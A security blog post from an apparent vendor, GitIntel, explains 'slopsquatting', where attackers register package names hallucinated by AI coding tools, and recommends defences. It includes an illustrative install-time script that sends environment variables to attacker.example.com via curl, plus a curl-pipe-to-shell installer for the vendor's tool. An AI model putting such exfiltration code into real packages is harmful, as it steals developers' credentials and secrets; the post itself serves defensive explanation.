Back to Blog
SecurityMarch 29, 2026 · 7 min read

AI Tools Hallucinate Package Names. Attackers Are Registering Them.

LLMs suggest non-existent npm/PyPI packages in ~5-20% of coding tasks. Attackers register those names with malicious payloads. Slopsquatting is the newest supply chain attack — and 51% AI-assisted commits means the attack surface is now enormous.

Published by GitIntel Research

TLDR

Socket Security, which monitors npm and PyPI for malicious packages, reported in 2024 that they were tracking a growing cluster of registrations that matched patterns consistent with LLM hallucination outputs — package names that didn't follow conventional naming patterns but appeared plausible as AI-generated suggestions. The security firm coined "slopsquatting" to describe the attack class.

The Scale Problem: 51% AI-Assisted Commits

What makes slopsquatting dangerous right now is the collision of two trends: AI tool adoption has reached a point where it's mainstream, but developer habits haven't fully adjusted to AI's failure modes.

Metric Figure
AI-assisted GitHub commits (2026) ~51%
Developers using AI tools daily 73%
Python hallucination rate (controlled study, 2025) ~20% of tasks
Packages on PyPI (March 2026) 590K+
Packages on npm (March 2026) 2.9M+
Average new malicious packages/week (npm + PyPI, 2025) ~500+

The combination is straightforward: if 73% of developers use AI tools daily, and even a conservative 5% hallucination rate on package suggestions produces millions of daily hallucinated import suggestions across the global developer base, the namespace exposure is enormous.

Attackers don't need to be sophisticated. Registering a PyPI package takes under five minutes and is free. Monitoring AI output for hallucinated names is automatable. The asymmetry favors the attacker.

Why Your CI Pipeline Won't Catch This

The slopsquatting attack is specifically designed to evade the tooling most teams already have. Here's why each layer fails:

Dependency scanners (Snyk, Dependabot, GitHub security alerts)

These tools check packages against known vulnerability databases. A newly registered malicious package has no CVEs. It will pass every automated scanner clean until someone reports it — which happens after the damage is done.

Lock files (

package-lock.json , poetry.lock )

Lock files pin exact versions — but only after a successful install. If the attacker's package is already registered when the developer first runs pip install , the malicious version gets pinned and committed.

Code review

Reviewers see a new dependency added to requirements.txt . Unless they specifically audit every new package name against PyPI and check the package's history, creation date, and author, there's no visible red flag.

AI code review tools (CodeRabbit, Copilot PR review)

These tools check code logic, not package provenance. An AI reviewing AI-generated code that added an AI-hallucinated package is unlikely to flag it. There's no provenance layer in the toolchain.

# What a malicious package install.py looks like
# (this is what runs at pip install time via setup.py)

import subprocess, os, socket, base64

def _exfil():
hostname = socket.gethostname()
env_data = base64.b64encode(
str(dict(os.environ)).encode()
).decode()
try:
subprocess.run([
"curl", "-s", "-X", "POST",
"https://attacker.example.com/collect",
"-d", f"h={hostname}&d={env_data}"
], timeout=3)
except Exception:
pass

_exfil() # Runs at install time, before any import

Simplified illustration of install-time exfiltration. Real attacks are often more subtle — they delay execution, check for CI environments to avoid detection, or persist as legitimate-looking utilities.

The Fix Starts in Git

The core problem is attribution. When an AI tool suggests a dependency, there's no record in git that the suggestion came from an AI. The developer commits the change, CI runs green, the package ships. The only way to audit this retroactively is to know which commits were AI-assisted.

That's not a hypothetical future requirement — it's a concrete reason why AI attribution in git matters for supply chain security, not just compliance.

Three-layer defense for AI-assisted dependency management:

  1. 1. Attribution at commit time. If your team uses Claude Code, Copilot, or Cursor, enforce Co-Authored-By trailers. This lets you run targeted package audits on commits where AI was involved — specifically checking any dependency changes in those commits.
  2. 2. Package age verification. Any new dependency added to your project should have a minimum age on its registry (e.g., 30 days). Packages registered last week and added today warrant scrutiny. This is automatable in CI.
  3. 3. Verify before you install. When an AI tool suggests a new import you haven't used before, check the registry directly: pip index versions package-name or npm view package-name . Look at the author, creation date, and download count. 40 downloads and registered last month is a red flag.
# Quick audit: check age of all packages in requirements.txt
# Works for any Python project

pip install pip-audit
pip-audit --requirement requirements.txt

# Or check a specific package's registry metadata
curl -s https://pypi.org/pypi/PACKAGE_NAME/json \\
| jq '.info.release_url, .urls[0].upload_time'

This Is Bigger Than One Attack Vector

Slopsquatting is a specific attack, but it points to a systemic gap: our software supply chain infrastructure was built for a world where developers chose their own dependencies. It has no layer for verifying that the suggestion came from a source that might hallucinate.

The npm and PyPI namespaces are effectively open-registration with no cost. Bad actors have always exploited this — typosquatting attacks predated LLMs by a decade. But slopsquatting scales the attack in a qualitatively different way: instead of guessing what humans will mistype, attackers can harvest the predictable outputs of LLMs running on millions of developer machines simultaneously.

The asymmetry problem

Attacker cost

Defender cost

The only scalable defense is infrastructure that brings AI attribution into the git layer. If you know a commit was AI-assisted and it added new dependencies, you can trigger automated package provenance checks specifically for that commit. Without attribution, you're auditing everything, all the time — which means most teams audit nothing.

What to Watch in the Next 12 Months

The EU AI Act, which begins enforcing against high-risk AI systems in August 2026, includes provisions on supply chain transparency. While it doesn't specifically address LLM-hallucinated dependencies, the "AI-generated content" disclosure requirements will push organizations toward better attribution practices across all AI-assisted work — including code.

On the registry side, PyPI's malware response team and npm security have both accelerated removal pipelines for confirmed malicious packages, but reactive removal doesn't prevent the first wave of installations. Proactive namespace protection — registering common LLM-hallucinated names as "reserved" or redirecting them to warnings — is an open governance question both registries are actively discussing.

For individual teams, the practical answer is available today: know which commits in your repo were AI-assisted, and apply additional scrutiny to dependency changes in those commits. That's not a complex workflow. It just requires the attribution data to exist in the first place.

Know what's AI-assisted in your repo

GitIntel scans your git history for AI-assisted commits — the first step toward auditing AI-suggested dependencies.

# Install
curl -fsSL https://gitintel.com/install.sh | sh

# Scan your repo — see AI commit attribution
cd your-repo
gitintel scan

View on GitHub

Open source (MIT) · Local-first · No data leaves your machine

Research published March 29, 2026. References: Socket Security (2024–2025), Sonatype State of the Software Supply Chain 2025, PyPI and npm public registry data.


Related reading on GitIntel: